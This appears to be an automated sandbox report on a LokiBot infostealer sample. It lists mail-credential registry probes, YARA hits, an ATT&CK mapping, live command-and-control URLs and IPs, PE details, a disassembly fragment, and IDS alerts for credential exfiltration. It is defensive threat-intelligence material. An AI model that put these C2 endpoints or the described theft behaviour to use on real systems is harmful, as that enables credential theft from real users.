Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Code function: PopPassword		0_2_0040D069
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Code function: SmtpPassword		0_2_0040D069

Source: Yara match	File source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	2 Credentials in Registry	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	97%	ReversingLabs	Win32.Infostealer.LokiBot
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	100%	Avira	TR/Crypt.XPACK.Gen
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	100%	Joe Sandbox ML

Name	Malicious	Reputation
http://94.156.177.220/simple/five/fre.php	true	unknown
http://kbfvzoboss.bid/alien/fre.php	true	unknown
http://alphastand.win/alien/fre.php	true	unknown
http://alphastand.trade/alien/fre.php	true	unknown
http://alphastand.top/alien/fre.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.220	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541921
Start date and time:	2024-10-25 10:19:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/2@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Simulations

Behavior and APIs

Time	Type	Description
04:20:04	API Interceptor	98x Sleep call for process: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.220	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	94.156.177.220/simple/five/fre.php
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	Logs.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220/skipo/five/fre.php
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	New Order.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/skipo/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	94.156.177.220
	sample.bin	Get hash	malicious	Okiru	Browse	93.123.85.166
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	Logs.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	hZ6ZMDS1rc.exe	Get hash	malicious	AsyncRAT	Browse	93.123.39.76
	New Order.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	93.123.85.38
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	93.123.85.38

Process:	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.053515766000424
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
File size:	106'496 bytes
MD5:	3fb350f4356f42b51a523b6fa8cbccf3
SHA1:	5f24115b8e734d11deea653df8b32c506c31f4b1
SHA256:	6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967
SHA512:	2cfa64f27aa30c8681d7d28ad8a330cb1c830ca6492aa916a4d3177127ee701556c80f234512802dd5c5cc1374c0f47c87ada6587a456c651e3ec3451c0e16af
SSDEEP:	1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG
TLSH:	02A32A42B2A5C030F7B74DB2BB73A5B7857E7C332D22C44E9352459A14215E1EB7AB13
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4139de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0239fd611af3d0e9b0c46c5837c80e09

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
and dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-04h]
push esi
push edi
push eax
call 00007F44208F0209h
push eax
call 00007F44208F01E6h
xor esi, esi
mov edi, eax
pop ecx
pop ecx
cmp dword ptr [ebp-04h], esi
jle 00007F44208F03C6h
push 004188BCh
push dword ptr [edi+esi*4]
call 00007F44208E2895h
pop ecx
pop ecx
test eax, eax
je 00007F44208F03ADh
push 00002710h
call 00007F44208E314Ah
pop ecx
inc esi
cmp esi, dword ptr [ebp-04h]
jl 00007F44208F037Eh
push 00000000h
call 00007F44208F01DEh
push 00000000h
call 00007F44208F04F2h
pop ecx
pop edi
xor eax, eax
pop esi
mov esp, ebp
pop ebp
retn 0010h
push ebp
mov ebp, esp
xor eax, eax
push eax
push eax
push E567384Dh
push eax
call 00007F44208DFB39h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+08h]
test esi, esi
je 00007F44208F0404h
push esi
call 00007F44208E2660h
pop ecx
test eax, eax
je 00007F44208F03F9h
push esi
call 00007F44208E069Ch
pop ecx
test eax, eax
je 00007F44208F03EEh
mov eax, dword ptr [0049FDECh]
cmp dword ptr [ebp+10h], 00000000h
cmovne eax, dword ptr [ebp+10h]
push eax
push dword ptr [0049FDE8h]
call 00007F44208E2094h
push dword ptr [ebp+0Ch]
push dword ptr [0049FDE8h]
call 00007F44208E2086h
push 00000000h
push 00000000h
push esi

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[ASM] VS2003 (.NET) build 3077
[ASM] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2013 UPD5 build 40629
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18ed0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x136f5	0x13800	94fa411af1cc6bb168a3ea0e66e80f78	False	0.5685096153846154	data	6.49204829439013	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x4060	0x4200	15686b489e8ad18c33f8b12a6e57b4ee	False	0.3659446022727273	data	4.255999483050136	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x85e24	0x200	955b3a57edf41d6c47c7225e8d847f91	False	0.056640625	OpenPGP Public Key	0.32171607431271465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.x	0xa0000	0x2000	0x2000	0c3dcd4efb800d2a9617b89e313aa361	False	0.0181884765625	data	0.19795807498627813	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
WS2_32.dll	getaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
KERNEL32.dll	GetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
ole32.dll	CoCreateInstance, CoInitialize, CoUninitialize
OLEAUT32.dll	VariantInit, SysFreeString, SysAllocString

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-25T10:20:01.424022+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49730	94.156.177.220	80	TCP
2024-10-25T10:20:01.424022+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49730	94.156.177.220	80	TCP
2024-10-25T10:20:01.424022+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49730	94.156.177.220	80	TCP
2024-10-25T10:20:02.412267+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49730	94.156.177.220	80	TCP
2024-10-25T10:20:03.047948+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49731	94.156.177.220	80	TCP
2024-10-25T10:20:03.047948+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49731	94.156.177.220	80	TCP
2024-10-25T10:20:03.047948+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49731	94.156.177.220	80	TCP
2024-10-25T10:20:04.020146+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49731	94.156.177.220	80	TCP
2024-10-25T10:20:04.092936+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:04.092936+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:04.092936+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:05.061102+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:05.061102+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:05.071273+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49732	TCP
2024-10-25T10:20:05.231108+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:05.231108+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:05.231108+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:06.219416+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:06.219416+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:06.226237+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49733	TCP
2024-10-25T10:20:06.375575+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:06.375575+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:06.375575+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:07.328677+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:07.328677+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:07.334473+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49734	TCP
2024-10-25T10:20:07.485394+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:07.485394+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:07.485394+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:09.431887+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:09.431887+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:09.432485+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49735	TCP
2024-10-25T10:20:09.597188+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:09.597188+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:09.597188+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:10.553813+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:10.553813+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:10.560448+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49736	TCP
2024-10-25T10:20:10.715160+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:10.715160+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:10.715160+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:11.713418+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:11.713418+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:11.719389+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49737	TCP
2024-10-25T10:20:12.310127+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:12.310127+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:12.310127+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:13.293592+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:13.293592+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:13.299728+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49738	TCP
2024-10-25T10:20:13.452612+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:13.452612+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:13.452612+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:14.398997+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:14.398997+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:14.406009+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49739	TCP
2024-10-25T10:20:14.593029+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:14.593029+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:14.593029+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:15.568040+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:15.568040+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:15.575285+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49740	TCP
2024-10-25T10:20:15.751617+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:15.751617+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:15.751617+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:16.716991+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:16.716991+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:16.722910+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49741	TCP
2024-10-25T10:20:16.872789+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:16.872789+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:16.872789+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:17.832440+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:17.832440+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:17.838629+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49744	TCP
2024-10-25T10:20:18.205156+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:18.205156+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:18.205156+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:19.151355+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:19.151355+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:19.157444+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49747	TCP
